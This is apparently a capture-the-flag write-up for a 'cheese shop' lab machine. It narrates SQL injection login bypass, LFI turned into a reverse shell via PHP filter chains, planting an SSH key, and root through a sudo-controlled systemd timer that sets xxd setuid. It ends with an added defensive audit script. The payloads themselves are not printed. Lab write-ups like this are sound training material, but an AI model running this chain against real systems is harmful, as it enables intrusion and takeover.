In this CTF, I perform SQLi, exploit an LFI vulnerability and turn it into RCE using tools, then escalate privileges through the /etc/systemd/system/exploit.timer service.
Reconnaissance
Figure 1
Figure 2
This was my first time doing Nmap scanning, and there were so many open ports, but the ports that actually work are port 80 and port 22.
Enumeration
Figure 3
This is what the website looks like; its title is a cheese shop.
SQL Injection
Figure 4
The website has a login form, and SQL injection can be used to bypass its authentication.
Figure 5
I managed to bypass the login form using the payload below. It redirects us to the cheese shop admin panel.
LFI Vulnerability
Figure 6
Notice that the PHP page takes a file parameter at the end of the URL ("file=<lfi payload>"), which lets us perform an LFI attack. Now it is time to turn the LFI into RCE.
LFI2RCE
Figure 7
For the LFI2RCE part, I'm using this tool: https://github.com/synacktiv/php_filter_chain_generator. This tool helps generate a PHP filter chain payload that carries a reverse shell. After that, send the payload using curl, as shown in Figure 7. Don't forget to set up a listener using netcat.
Command to use the tool:
Command to send the payload using curl:
PrivEsc
Figure 8
For the Privilege Escalation part, I transferred the linpeas script to the victim machine.
Figure 9
Found the yellow- and red-highlighted findings that can be exploited to gain privilege escalation.
Figure 10
Based on Figure 9, we can write the SSH key in the "/authorized_keys" directory. Figure 10 shows that we created our own SSH key.
Figure 11
Copy the RSA public key from id_rsa.pub and add it to "/home/comte/.ssh/authorized_keys".
Log in using SSH:
Figure 12
Then we have our user.txt flag.
Figure 13
To escalate to the root user, I'm using the command sudo -l. It looks like we can run sudo without a password on the exploit.timer service.
Figure 14
In the timer section, set the value to 5s, so the service will start 5 seconds after boot.
Figure 15
Restart the service, then enable and start it again, and make sure it is running. At this point, I was stuck for a while because nothing happened.
Figure 16
After that, I ran linpeas again and found that "xxd" is highlighted in yellow; it looks like it can be exploited. The timer in Figure 15 triggers exploit.service, which gave setuid permissions to the xxd binary, allowing it to run with elevated privileges.
Figure 17
Find the exploit on the GTFOBins site.
Figure 18
Craft the exploit as shown in Figure 17. Then log in again over SSH, this time as the root user.
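As an added defensive check, not part of the original writeup: a small POSIX shell audit that flags the two conditions this privilege escalation chain relied on, a unit or timer file that non-root users can modify, and a service whose Exec line hands out the setuid bit. The directory argument and the sample unit files are constructed for illustration; on a real host you would point it at /etc/systemd/system.

```shell
#!/bin/sh
# Added audit helper (hypothetical, not from the writeup). Lists systemd
# unit/timer files that a non-root user could edit, and service units whose
# Exec* line sets the setuid bit on a binary. Either finding means that a
# sudo NOPASSWD right to restart the unit is effectively a root shell.

# Print "<file> writable" for .service/.timer files writable by group/others.
audit_unit_perms() {
    dir="$1"
    find "$dir" -type f \( -name '*.service' -o -name '*.timer' \) \
        -perm /022 -print 2>/dev/null | sed 's/$/ writable/'
}

# Print "<file> setuid-exec" for service units whose Exec* line runs chmod
# with +s / u+s or a numeric mode of the form 4xxx (setuid bit set).
audit_unit_exec() {
    dir="$1"
    grep -lE '^Exec[A-Za-z]*=.*chmod[[:space:]]+([ugoa]*\+s|[0-7]?[4-7][0-7]{3})' \
        "$dir"/*.service 2>/dev/null | sed 's/$/ setuid-exec/'
}

# Run both checks against one unit directory.
audit_units() {
    audit_unit_perms "$1"
    audit_unit_exec "$1"
}
```

Anything it prints deserves a look at `sudo -l` output and the unit's ownership; the fix is root-owned 0644 unit files and no Exec lines that change file modes.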